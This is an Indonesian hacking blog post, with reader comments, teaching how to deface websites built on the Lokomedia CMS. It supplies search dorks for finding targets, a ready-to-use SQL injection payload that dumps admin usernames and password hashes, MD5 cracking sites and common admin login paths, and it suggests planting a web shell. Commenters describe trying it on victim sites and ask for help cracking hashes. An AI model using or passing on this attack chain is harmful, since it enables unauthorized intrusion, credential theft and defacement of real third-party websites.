Malem fanss :* Malem juga haters :p. Berandal update lagi nih :* Kali ini gw mau share Tutorial Cara Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Web Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak.
Oke, simak langsung aja ya tutorial deface web cms lokomedia :) .
Bahan :
1. Dork :
inurl:/statis-1-profil.htmlKembangin lagi biar dapet yg VULN + Perawan :p
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Dork lengkap tunggu post selanjutnya :*
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter
KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI!
Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+Gatau caranya? :v Sini gw ajarin :p
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Baca juga: Install Websploit Termux
4. Kalo vuln jadinya bakal kek gini.
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
Baca juga: Tutorial Deface WP Themes Qualifire.
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)
Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D (terdelete)
Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)
Sumber: Garuda Security Hacker dan TKJ Cyber Art
Regards,
Berandal. [OWL SQUAD]
kok agan gampang bener ya :v, ane gagal mulu pas bagian hash md5, selalu not found pas mau di decrypt di hashkiller / md5decrypt. solusi dong gan
ReplyDeleteFaktor face :v, mungkin belum beruntung, atau kalo mau yha decrypt manual sendiri :D, atau gk yha asal nebak aj
Deletecoba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
ReplyDeleteterima kasih.
ente pake CMS apa gan ?
Deletesorry min w numpang lewat doang :V
Deleteedeh bocah 1 ni :'v cms gk ada web make blogger :'v pea
This comment has been removed by the author.
Deletekalau login di cpanel suka salah nih
ReplyDeletepassword yg didapat dengan teknik sql lokomedia beda sama password cpanel gan :)
Deletejudul lagu videonya apa gan?
ReplyDeletebukannya diliatin pas aal video gan :D
Deleteudh nemu vuln + id pw admin login udh ketemu ehh pas mau isi id pw admin malah gk ada :3
ReplyDeleteID+Pass udah dapet, eh adminnya loginnya yg ribet dicari XD
ReplyDeleteitu masalah utama sql lokmed ini hwhwh
DeleteAne udah ke cpanel tpi waktu koneksi berahir mulu gan
DeleteKok blank ya mas ? Udah berhasil semua , waktu masuk ke log-in admin udah dimasukin datanya kok blank ?
ReplyDeleteNjemg Not Found semua :3
ReplyDeleteCari admin loginnya very hard..
ReplyDeleteada yg tau ini tipe hash apa?? c1717b01367691479191356d2ee376d7
ReplyDeleteadmin login nya gimana nih :V pada ngilang gua liat di site site korban :V
ReplyDeletedi umpetin kali ya :V
ReplyDeletekampret
ReplyDeleteLINK HALAMAN ADMIN LOGIN DIMANA? UDH KELILING GAK ADA TOMBOL LOGIN AKMJ
ReplyDeleteunch unch :*
ReplyDeleteberandal... aku ngefans sama berandal :*
Web Vulnnya berbentuk apa gan? Gw daritadi nyari pas masukin exploit 404 NOT FOUND
ReplyDeleteMohon dijawab:)
Salken dari JAKARTA CYBER ARMY
Post a Comment
Komentar Spam Akan kami Hapus